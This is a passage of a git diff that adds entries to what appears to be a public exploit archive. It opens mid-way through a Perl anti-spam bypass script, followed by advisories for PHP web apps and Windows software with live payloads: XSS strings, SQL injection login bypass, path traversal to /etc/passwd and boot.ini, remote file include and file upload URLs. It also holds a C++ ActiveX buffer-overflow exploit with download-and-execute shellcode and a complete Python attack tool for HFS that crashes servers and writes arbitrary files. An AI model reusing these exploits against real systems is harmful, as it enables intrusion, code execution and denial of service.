+# On form submit, both key values are checked and they should match to
+allow comment insertion.
+
+#How the exploit works:
+# It does nothing but acting as a client. It parses the html, extracts
+the javascript, process it
+# to calculate the key and fills the hidden field with it.
+
+# Solution:
+# Sorry guys but there's no fix for this. It'ss just a design flaw.
+
+use WWW::Mechanize;
+use JavaScript::SpiderMonkey;
+
+my $tmpContent;
+my $javascriptCode;
+my $spamBamKey;
+
+die ("Usage: spambam.pl \n") unless
+$ARGV[3];
+
+my $url = $ARGV[0];
+my $author = $ARGV[1];
+my $email = $ARGV[2];
+my $comment = $ARGV[3];
+
+my $mech = WWW::Mechanize->new( autocheck => 1 );
+
+$mech->get($url);
+
+# WWW::Mechanize doesn't support javascript, so the field
+comment_spambamKey won't be
+# recognized by $mech->field. Thus, I'll make an update_html adding the
+field, and for
+# this purpose I save first the original contents. Indeed, substitition
+occurs via the
+# javascript callback function "extractKey"
+$tmpContent = $mech->content;
+
+
+# Eliminate carriage returns to apply sed. Later I'll have to restore
+them
+# to execute the javascript code, as not every line is semicolon
+terminated.
+# That's the reason of the __WHO_BAMS_WHO__ string.
+$_ = $mech->content;
+s/\n/__WHO_BAMS_WHO__/g;
+
+# Extract the javascript code and the name of the variable where the key
+is going to be calculated
+/
diff --git a/platforms/php/webapps/31037.txt b/platforms/php/webapps/31037.txt
new file mode 100755
index 000000000..ad4b93a0c
--- /dev/null
+++ b/platforms/php/webapps/31037.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27346/info
+
+phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
+
+phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[Target.il]/[Path]/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=[SH3LL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31038.txt b/platforms/php/webapps/31038.txt
new file mode 100755
index 000000000..37026278d
--- /dev/null
+++ b/platforms/php/webapps/31038.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27346/info
+
+phpAutoVideo is prone to a cross-site scripting vulnerability and a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+Attackers can exploit these issues to execute arbitrary code within the context of the webserver process, steal cookie-based authentication credentials, and launch other attacks.
+
+phpAutoVideo 2.21 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[Target.il]/[Path]/index.php?cat=%22%3E%3Cscript%3Ealert(1);%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/31041.txt b/platforms/php/webapps/31041.txt
new file mode 100755
index 000000000..5109c543f
--- /dev/null
+++ b/platforms/php/webapps/31041.txt
@@ -0,0 +1,20 @@
+source: http://www.securityfocus.com/bid/27361/info
+
+bloofoxCMS is prone to a directory-traversal vulnerability, a SQL-injection vulnerability, and an authentication-bypass vulnerability.
+
+The SQL-injection vulnerability occurs because the application fails to sufficiently sanitize user-supplied data to the 'username' parameter of the 'class_permissions.php' script before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+The authentication-bypass vulnerability stems from a lack of input-validation mechanisms in the 'system/class_permissions.php' file. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+The directory-traversal vulnerability occurs because the application fails to properly sanitize user-supplied input data to the 'file' parameter of 'file.php'. The attacker's input would consist of '../' directory-traversal sequences. Successful exploits could allow the attacker to access the contents of potentially sensitive files on the affected computer. Information obtained may help the attacker launch other attacks against the system.
+
+bloofoxCMS 0.3 is vulnerable to these issues; previous versions may be affected as well.
+
+Username: admin' or 1=1 /*
+Password: something
+
+An example for the directory-traversal vulnerability was provided:
+
+GET: http://www.example.com/bloofoxCMS_0.3/file.php?file=../../system/class_mysql.php
+
+
diff --git a/platforms/php/webapps/31044.txt b/platforms/php/webapps/31044.txt
new file mode 100755
index 000000000..680df21ed
--- /dev/null
+++ b/platforms/php/webapps/31044.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27382/info
+
+singapore Modern template is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Modern 1.3.2 and prior versions are reported vulnerable. Reports indicate that Modern 1.3.2 ships with singapore 0.10.1 by default.
+
+http://www.example.com/[singapore_path]/default.php?gallery=">
\ No newline at end of file
diff --git a/platforms/php/webapps/31045.txt b/platforms/php/webapps/31045.txt
new file mode 100755
index 000000000..c42fb471a
--- /dev/null
+++ b/platforms/php/webapps/31045.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27383/info
+
+Small Axe Weblog is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
+
+This issue affects Small Axe Weblog 0.3.1; other versions may also be vulnerable.
+
+http://www.example.com/inc/linkbar.php?ffile=http://www.example2.com
\ No newline at end of file
diff --git a/platforms/php/webapps/31048.txt b/platforms/php/webapps/31048.txt
new file mode 100755
index 000000000..abc3ef0d6
--- /dev/null
+++ b/platforms/php/webapps/31048.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/27397/info
+
+PacerCMS is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in SQL queries.
+
+A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
+
+These issues affect versions prior to PacerCMS 0.6.1.
+
+NOTE: To exploit these issues, the attacker may require 'staff member' access.
+
+http://www.example.com/pacercms/siteadmin/article-edit.php?id=[SQL]
\ No newline at end of file
diff --git a/platforms/php/webapps/31049.txt b/platforms/php/webapps/31049.txt
new file mode 100755
index 000000000..3e270ac2c
--- /dev/null
+++ b/platforms/php/webapps/31049.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27401/info
+
+DeluxeBB is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects DeluxeBB 1.1; other versions may also be vulnerable.
+
+http://www.example.com/path/templates/default/admincp/attachments_header.php?lang_listofmatches=
\ No newline at end of file
diff --git a/platforms/php/webapps/31060.txt b/platforms/php/webapps/31060.txt
new file mode 100755
index 000000000..49bf805d9
--- /dev/null
+++ b/platforms/php/webapps/31060.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27459/info
+
+Drake CMS is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Drake CMS 0.4.9 is vulnerable; other versions may also be affected.
+
+http://www.example.com/[path]/index.php?option="'>&Itemid=12
\ No newline at end of file
diff --git a/platforms/php/webapps/31061.txt b/platforms/php/webapps/31061.txt
new file mode 100755
index 000000000..21e2e9372
--- /dev/null
+++ b/platforms/php/webapps/31061.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27460/info
+
+The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
+
+http://www.example.com/user/index.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/31062.txt b/platforms/php/webapps/31062.txt
new file mode 100755
index 000000000..63cd797f2
--- /dev/null
+++ b/platforms/php/webapps/31062.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27460/info
+
+The 'trixbox' product is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+These issues affect trixbox 2.4.2.0; earlier versions may also be vulnerable.
+
+http://www.example.com/maint/index.php?">
\ No newline at end of file
diff --git a/platforms/php/webapps/31063.txt b/platforms/php/webapps/31063.txt
new file mode 100755
index 000000000..adb3687c0
--- /dev/null
+++ b/platforms/php/webapps/31063.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27461/info
+
+WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
+
+These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
+
+http://www.example.com/pref.php?>'">
\ No newline at end of file
diff --git a/platforms/php/webapps/31064.txt b/platforms/php/webapps/31064.txt
new file mode 100755
index 000000000..abc6390d3
--- /dev/null
+++ b/platforms/php/webapps/31064.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27461/info
+
+WebCalendar is prone to multiple HTML-injection and cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Attacker-supplied HTML and script code would run in the context of the affected site, potentially allowing an attacker to steal cookie-based authentication credentials. The attacker could also exploit the HTML-injection issues to control how the site is rendered to the user; other attacks are also possible.
+
+These issues affect WebCalendar 1.1.6; other versions may also be vulnerable.
+
+http://www.example.com/search.php?adv=>"'>
\ No newline at end of file
diff --git a/platforms/php/webapps/31065.txt b/platforms/php/webapps/31065.txt
new file mode 100755
index 000000000..e42902e78
--- /dev/null
+++ b/platforms/php/webapps/31065.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27462/info
+
+F5 BIG-IP Application Security Manager is prone to a cross-site scripting vulnerability because the web management interface fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected device. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+This issue affects F5 BIG-IP Application Security Manager 9.4.3; other versions may also be vulnerable.
+
+https://(target)/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+
\ No newline at end of file
diff --git a/platforms/php/webapps/31066.txt b/platforms/php/webapps/31066.txt
new file mode 100755
index 000000000..646122ba8
--- /dev/null
+++ b/platforms/php/webapps/31066.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27470/info
+
+The MOStlyCE module for Mambo is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
+
+http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=
\ No newline at end of file
diff --git a/platforms/php/webapps/31067.txt b/platforms/php/webapps/31067.txt
new file mode 100755
index 000000000..786d917b8
--- /dev/null
+++ b/platforms/php/webapps/31067.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27471/info
+
+ClanSphere is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit this vulnerability using directory-traversal strings to access potentially sensitive information that may aid in further attacks.
+
+ClanSphere 2007.4.4 is vulnerable to this issue; other versions may also be affected.
+
+http://www.example.com/install.php?lang=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
\ No newline at end of file
diff --git a/platforms/php/webapps/31068.txt b/platforms/php/webapps/31068.txt
new file mode 100755
index 000000000..1227facd9
--- /dev/null
+++ b/platforms/php/webapps/31068.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27472/info
+
+The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.
+
+Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.
+
+MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected.
+
+http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=
\ No newline at end of file
diff --git a/platforms/php/webapps/31069.txt b/platforms/php/webapps/31069.txt
new file mode 100755
index 000000000..e4c5edd40
--- /dev/null
+++ b/platforms/php/webapps/31069.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27473/info
+
+eTicket is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
+
+eTicket 1.5.6-RC4 is vulnerable; prior versions may also be affected.
+
+http://www.example.com/index.php/">
\ No newline at end of file
diff --git a/platforms/windows/local/31036.txt b/platforms/windows/local/31036.txt
new file mode 100755
index 000000000..9fd0db8f1
--- /dev/null
+++ b/platforms/windows/local/31036.txt
@@ -0,0 +1,24 @@
+source: http://www.securityfocus.com/bid/27341/info
+
+CORE FORCE Firewall and Registry modules are prone to multiple local kernel buffer-overflow vulnerabilities because the software fails to adequately verify user-supplied input.
+
+Local attackers can exploit these issues to cause denial-of-service conditions. Attackers may also be able to escalate privileges and execute arbitrary code, but this has not been confirmed.
+
+These issues affect versions up to and including CORE FORCE 0.95.167.
+
+All the vulnerabilities can be reproduced by running a combination of
+DC2 and BSODHook tools.
+
+Step by step instructions:
+
+- Get DC2.exe (Driver Path Verifier) from the latest Windows Driver Kit.
+
+- Login as unprivileged user.
+
+- Run "dc2 /hct /a".
+
+- Get BSODHook.exe from Matousec
+http://www.matousec.com/projects/windows-personal-firewall-analysis/plague-in-security-software-drivers.php
+
+- Click on "Load Driver" then click on "Find SSDT hooks" then "Add to
+probe list" and then "GO".
diff --git a/platforms/windows/remote/31039.txt b/platforms/windows/remote/31039.txt
new file mode 100755
index 000000000..0d923d0a0
--- /dev/null
+++ b/platforms/windows/remote/31039.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27358/info
+
+BitDefender Update Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
+
+Exploiting this issue allows an attacker to access potentially sensitive information that could aid in further attacks.
+
+BitDefender Security for File Servers, BitDefender Enterprise Manger, and other BitDefender products that include the Update Server are vulnerable. This issue affects Update Server when running on Windows; Linux and UNIX variants may also be affected.
+
+echo -e "GET /../../boot.ini HTTP/1.0\r\n\r\n" | nc
\ No newline at end of file
diff --git a/platforms/windows/remote/31040.html b/platforms/windows/remote/31040.html
new file mode 100755
index 000000000..b5361468f
--- /dev/null
+++ b/platforms/windows/remote/31040.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/27360/info
+
+Surveillix DVR 'MeIpCamX.DLL' ActiveX control is prone to multiple buffer-overflow vulnerabilities because the application fails to perform adequate boundary checks on user-supplied data.
+
+Successfully exploiting these issues allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+These issues affect 'MeIpCamX.DLL' 1.0.0.4; other versions may also be vulnerable.
+
+
\ No newline at end of file
diff --git a/platforms/windows/remote/31046.cpp b/platforms/windows/remote/31046.cpp
new file mode 100755
index 000000000..c55bde1a1
--- /dev/null
+++ b/platforms/windows/remote/31046.cpp
@@ -0,0 +1,80 @@
+source: http://www.securityfocus.com/bid/27393/info
+
+GlobalLink 'GLChat.ocx' ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed exploit attempts likely result in denial-of-service conditions.
+
+GlobalLink 'GLChat.ocx' ActiveX control 2.5.1.33 is reported affected by this issue; other versions may also be vulnerable.
+
+//date:2007.10 fuzz by Knell@Knell-0xSec QQ:415964
+#define _CRT_SECURE_NO_DEPRECATE
+
+#include
+#include
+
+const unsigned char shellcode[174] =
+{
+0xE8, 0x00, 0x00, 0x00, 0x00, 0x6A, 0x03, 0xEB, 0x21, 0x7E, 0xD8, 0xE2, 0x73, 0x98, 0xFE, 0x8A,
+0x0E, 0x8E, 0x4E, 0x0E, 0xEC, 0x55, 0x52, 0x4C, 0x4D, 0x4F, 0x4E, 0x00, 0x00, 0x36, 0x1A, 0x2F,
+0x70, 0x63, 0x3A, 0x5C, 0x63, 0x2E, 0x65, 0x78, 0x65, 0x00, 0x59, 0x5F, 0xAF, 0x67, 0x64, 0xA1,
+0x30, 0x00, 0x8B, 0x40, 0x0C, 0x8B, 0x70, 0x1C, 0xAD, 0x8B, 0x68, 0x08, 0x51, 0x8B, 0x75, 0x3C,
+0x8B, 0x74, 0x2E, 0x78, 0x03, 0xF5, 0x56, 0x8B, 0x76, 0x20, 0x03, 0xF5, 0x33, 0xC9, 0x49, 0x41,
+0xAD, 0x03, 0xC5, 0x33, 0xDB, 0x0F, 0xBE, 0x10, 0x38, 0xF2, 0x74, 0x08, 0xC1, 0xCB, 0x0D, 0x03,
+0xDA, 0x40, 0xEB, 0xF1, 0x3B, 0x1F, 0x75, 0xE7, 0x5E, 0x8B, 0x5E, 0x24, 0x03, 0xDD, 0x66, 0x8B,
+0x0C, 0x4B, 0x8B, 0x5E, 0x1C, 0x03, 0xDD, 0x8B, 0x04, 0x8B, 0x03, 0xC5, 0xAB, 0x59, 0xE2, 0xBC,
+0x8B, 0x0F, 0x80, 0xF9, 0x63, 0x74, 0x0A, 0x57, 0xFF, 0xD0, 0x95, 0xAF, 0xAF, 0x6A, 0x01, 0xEB,
+0xAC, 0x52, 0x52, 0x57, 0x8D, 0x8F, 0xDB, 0x10, 0x40, 0x00, 0x81, 0xE9, 0x4E, 0x10, 0x40, 0x00,
+0x51, 0x52, 0xFF, 0xD0, 0x6A, 0x01, 0x57, 0xFF, 0x57, 0xEC, 0xFF, 0x57, 0xE8, 0x90
+};
+
+const char* script1 = \
+""
+""
+"";
+
+int main(int argc, char* argv[])
+{
+if ( argc != 2 )
+{
+printf("usage:knell.exe down&exec-url\njÖʽçlobalLink)GLChat.ocx ActiveX Control BoF exploit\n bug fuzz by knell 2007.10\n");
+return -1;
+}
+
+FILE *file = fopen("knell.html", "w+");
+if ( file == NULL )
+{
+printf("create 'knell.html' failed!\n");
+return -2;
+}
+
+fprintf(file, "%s", script1);
+for ( unsigned i = 0; i < sizeof (shellcode); i += 2 )
+fprintf(file, "%%u%02X%02X" , shellcode[i + 1], shellcode[i]);
+
+const unsigned l = strlen(argv[1]);
+for ( unsigned j = 0; j < l; j += 2 )
+fprintf(file, "%%u%02X%02X" , argv[1][j + 1], argv[1][j]);
+
+fprintf(file, "%s", script2);
+fclose(file);
+
+printf("make 'knell.html' successed!\n");
+
+return 0;
+}
diff --git a/platforms/windows/remote/31056.py b/platforms/windows/remote/31056.py
new file mode 100755
index 000000000..76d40e884
--- /dev/null
+++ b/platforms/windows/remote/31056.py
@@ -0,0 +1,334 @@
+source: http://www.securityfocus.com/bid/27423/info
+
+HFS (HTTP File Server) is prone to multiple security vulnerabilities, including cross-site scripting issues, an information-disclosure issue, an arbitrary file-creation issue, a denial-of-service issue, a username-spoofing issue, and a logfile-forging issue.
+
+A successful exploit could allow an attacker to deny service to legitimate users, create and execute arbitrary files in the context of the webserver process, falsify log information, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
+
+#!/usr/bin/python
+
+"""
+----------------------------------------------------------------
+HFSHack 1.0b (By Felipe M. Aragon And Alec Storm )
+----------------------------------------------------------------
+* CVE-2008-0409 - Cross-Site Scripting (XSS) and Host Field XSS
+* CVE-2008-0410 - Information Disclosure Vulnerability
+Affected Versions: HFS 2.0 to and including 2.3(Beta Build 174)
+http://www.syhunt.com/advisories/hfs-1-template.txt
+
+* CVE-2008-0405 - Arbitrary File/Folder Creation Vulnerability
+* CVE-2008-0406 - Denial of Service (DoS) Vulnerability
+Affected Versions: HFS 2.2 to and including 2.3(Beta Build 174)
+http://www.syhunt.com/advisories/hfs-1-log.txt
+
+* CVE-2008-0407 - Username Spoofing Vulnerability
+* CVE-2008-0408 - Log Forging / Injection Vulnerability
+Affected Versions: HFS 1.5g to and including 2.3(Beta Build
+174); and possibly HFS version 1.5f
+http://www.syhunt.com/advisories/hfs-1-username.txt
+
+Vulnerabilities found by Syhunt (http://www.syhunt.com)
+Sandcat can also identify these issues:
+http://www.syhunt.com/sandcat
+"""
+
+import urllib2, sys, re, commands, StringIO, string, base64
+
+host = '127.0.0.1' # Default Host
+
+help = ('\n'
+'open [hostname]\n'
+' This should be called first (unless you want the default host)\n\n'
+'checkdos\n'
+' Performs the Log DoS Attack (Makes the server crash)\n\n'
+'checkxss\n'
+' Checks for the presence of the Template XSS Vulnerability\n\n'
+'manipf [localfilename] [remotefilename]\n'
+' Appends content of a local file to a remote file. Examples:\n'
+' manipf inject.html index.html or ..\\..\index.html\n'
+' Note: If the file does not exists, it will be created.\n\n'
+'maniplog [localfilename]\n'
+' Injects content of a local file to the HFS log panel and file\n\n'
+'mkd [dirname]\n'
+' Creates directories. Examples:\n'
+' mkd Test or ..\\..\\Windows\\Test\n\n'
+'symbols\n'
+' Forces HFS to reveal details about the server\n\n'
+'ver\n'
+' Forces HFS to show its version and build, and displays which\n\n'
+' HFSHack commands are available for it\n'
+'quit\n'
+' Exits this application'
+'\r\n')
+
+readme = (
+'(c) 2008 Syhunt Security. All rights reserved.\n\n'
+'This tool is provided ''as-is'', without any expressed or implied\n'
+'warranty. In no event will the author be held liable for any\n'
+'damages arising from the use of this tool.\n\n'
+'Permission is granted to anyone to use this tool, and to alter\n'
+'it and redistribute it freely, subject to the following\n'
+'restrictions:\n\n'
+'1. The origin of this tool must not be misrepresented, you must\n'
+' not claim that you wrote the original tool.\n\n'
+'2. Altered source versions must be plainly marked as such, and\n'
+' must not be misrepresented as being the original plugin.\n\n'
+'3. This notice may not be removed or altered from any source\n'
+' distribution.\n\n'
+'If you have any questions concerning this license, please email\n'
+'contact _at_ syhunt _dot_ com\n'
+)
+
+about = (
+'----------------------------------------------------------------\n'
+' Syhunt HFSHack 1.0b\n'
+'----------------------------------------------------------------\n\n'
+'This exploit tool should be used only by system administrators\n'
+'(or other people in charge).\n\n'
+'Type "readme" and read the text before continuing\n\n'
+'If you have already read it, type "help" to view a list of\n'
+'commands.'
+)
+
+# Extra Details to Obtain
+symbol_list = (
+'connections;Current number of connections to HFS',
+'timestamp;Date and time of the server',
+'uptime;Uptime',
+'speed-out;Current outbound speed',
+'speed-in;Current inbound speed',
+'total-out;Total amount of bytes sent',
+'total-downloads;Total amount of bytes sent',
+'total-hits;Total Hits',
+'total-uploads;Total Uploads',
+'number-addresses;Current number of connected clients (IPs)',
+'number-addresses-ever;Number of unique IPs ever connected',
+'number-addresses-downloading;Current number of downloading clients (IPs)',
+)
+
+# Affected Versions
+re_200801161 = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
+re_200801162 = '^HFS(.*?)(2.2$|2.2[a-b]|2.3 beta)'
+re_200801163 = '^HFS(.*?)(1.5[f-g]|1.6|2.[0-1]|2.2$|2.2[a-b]|2.3 beta)'
+re_cangetver = '^HFS(.*?)(2.[0-1]|2.2$|2.2[a-b])'
+
+# Common Messages
+msg_par_mis = 'Parameter(s) missing.'
+msg_done = 'Done.\n'
+msg_acc_file = 'Error reading local file (file not found):'
+msg_help = 'Type "help" to view a list of commands.'
+msg_err_con = 'Error Connecting:'
+msg_fail = 'Failed.'
+msg_req_ok = 'Request accepted.'
+
+uagent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; Syhunt HFSHack)';
+path = '/' # Default Path
+
+def dorequest(hpath,auth_data,s_msg,f_msg):
+ globals()["rcvd"] = ''
+ globals()["banner"] = ''
+ url = 'http://'+host+hpath
+ try:
+ opener = urllib2.build_opener(url)
+ opener.addheaders = [('User-agent', uagent)]
+ if auth_data != '':
+ opener.addheaders = [('Authorization', 'Basic '+auth_data)]
+ globals()["rcvd"] = opener.open(url).readlines()
+ if 'server' in opener.open(url).headers:
+ globals()["banner"] = opener.open(url).headers['server']
+ except Exception, msg:
+ if f_msg != '':
+ print f_msg,msg
+ return False
+ else:
+ if s_msg != '':
+ print s_msg
+ return True
+
+def genbase64str(string):
+ base64str = base64.encodestring(string);
+ base64str = base64str.replace("\n","")
+ return base64str
+
+def readlocalfile(filename):
+ file = open(filename, "r")
+ text = file.readlines()
+ file.close()
+ print text
+ filecontentstr = ''
+ for l in text:
+ filecontentstr = filecontentstr+l
+ return filecontentstr
+
+def ishostavailable():
+ return dorequest(path,'','',msg_err_con)
+
+def getservinfo(symbol,desc):
+ base64str = base64.encodestring('%'+symbol+'%');
+ if dorequest(path,base64str,'',msg_err_con):
+ for l in rcvd:
+ hfsver = re.findall('(.*?)', l)
+ for r in hfsver:
+ if r != []:
+ hfsverdec = urllib2.unquote(hfsver[0])
+ if desc != '':
+ print desc+': '+hfsverdec
+ return hfsverdec
+ else:
+ return ''
+
+def getallservinf():
+ for l in symbol_list:
+ curl = l.split(';')
+ getservinfo(curl[0],curl[1])
+
+def hfsmkdir(dirname):
+ base64str = genbase64str('\\..\\'+dirname+'\\')+'AA';
+ dorequest(path,base64str,msg_req_ok,msg_fail)
+
+def shutdownhfs():
+ dosstr = genbase64str('a' * 270 + ':')
+ if dorequest(path,dosstr,msg_fail,'DoS executed.'):
+ dorequest(path,'','Host is still up.','Host is now down.')
+
+def hfsappendtofile(filename,string):
+ base64str = genbase64str('\\..\\'+filename)+'AA';
+ dorequest('/?%0a'+string,base64str,msg_req_ok,msg_fail)
+
+def hfsinjecttolog(string):
+ base64str = genbase64str(string);
+ dorequest('/',base64str,msg_req_ok,msg_fail)
+
+def procparams(cmd):
+ try:
+ if len(cmd) > 0:
+ if cmd[1] != []:
+ globals()["host"] = cmd[1]
+ except:
+ print "No target info provided. Using localhost"
+
+def checkxss():
+ if ishostavailable():
+ curver = getservinfo('version','')
+ if curver != '':
+ return 'XSS Found'
+ else:
+ return 'Not Vulnerable'
+ else:
+ return msg_fail
+
+def isbanner(regex):
+ p = re.compile(regex)
+ m = p.match(banner)
+ return m
+
+def showacceptedcmds():
+ cmds = 'None (This server is not vulnerable)';
+ if isbanner(re_200801161):
+ cmds = 'checkxss symbols ver'
+ if isbanner(re_200801162):
+ cmds = cmds+' manipf mkd checkdos'
+ if isbanner(re_200801163):
+ cmds = cmds+' maniplog'
+ print '\nAvailable commands for this server:'
+ print ' '+cmds+'\n'
+
+def showver():
+ cangetver = True
+ if banner != '':
+ server_name = banner.split()
+ print banner
+ if server_name[0] != 'HFS':
+ print 'Not running HFS!'
+ cangetver = False
+ else:
+ if isbanner(re_cangetver):
+ print 'Confirming version...'
+ else:
+ cangetver = False
+ else:
+ print 'No version information found.'
+ print 'The "Send HFS identifier" option is probably disabled.'
+ print 'Trying to force HFS to display its version...'
+ if cangetver == True:
+ idver = getservinfo('version','HFS version number')
+ idbuild = getservinfo('build','HFS build number')
+ globals()["banner"] = 'HFS '+idver+' '+idbuild
+ showacceptedcmds()
+
+def result(s):
+ cmd = s.split()
+ if len(cmd) > 0:
+ curcmd = cmd[0]
+ result = 'Invalid command. Type "help" for list of commands.'
+ if curcmd == 'open':
+ procparams(cmd)
+ if ishostavailable():
+ showver()
+ result = 'Connected.\n'
+ else:
+ result = msg_fail
+ elif curcmd == 'symbols':
+ if ishostavailable():
+ showver()
+ print 'Forcing HFS to reveal more details...'
+ getallservinf()
+ result = msg_done
+ elif curcmd == 'ver':
+ if ishostavailable():
+ showver()
+ result = msg_done
+ elif curcmd == 'mkd':
+ if len(cmd) > 1:
+ if cmd[1] != []:
+ hfsmkdir(cmd[1])
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'manipf':
+ if len(cmd) > 2:
+ try:
+ localfilecontent = readlocalfile(cmd[1])
+ except Exception, msg:
+ result = msg_acc_file,msg
+ else:
+ localfilecontent = localfilecontent.replace("\n","%0a")
+ hfsappendtofile(cmd[2],localfilecontent)
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'maniplog':
+ if len(cmd) > 1:
+ try:
+ localfilecontent = readlocalfile(cmd[1])
+ except Exception, msg:
+ result = msg_acc_file,msg
+ else:
+ hfsinjecttolog(localfilecontent)
+ result = msg_done
+ else:
+ result = msg_par_mis
+ elif curcmd == 'checkdos':
+ shutdownhfs()
+ result = msg_done
+ elif curcmd == 'checkxss':
+ result = checkxss()
+ elif curcmd == 'help':
+ result = help
+ elif curcmd == 'readme':
+ result = readme
+ elif curcmd == 'quit':
+ result = 'Bye!'
+ return result
+ else:
+ return msg_help
+
+print about
+
+s = ""
+while s != "quit":
+ try: s = raw_input(">")
+ except EOFError:
+ s = "quit"
+ print s
+ print result(s)
+
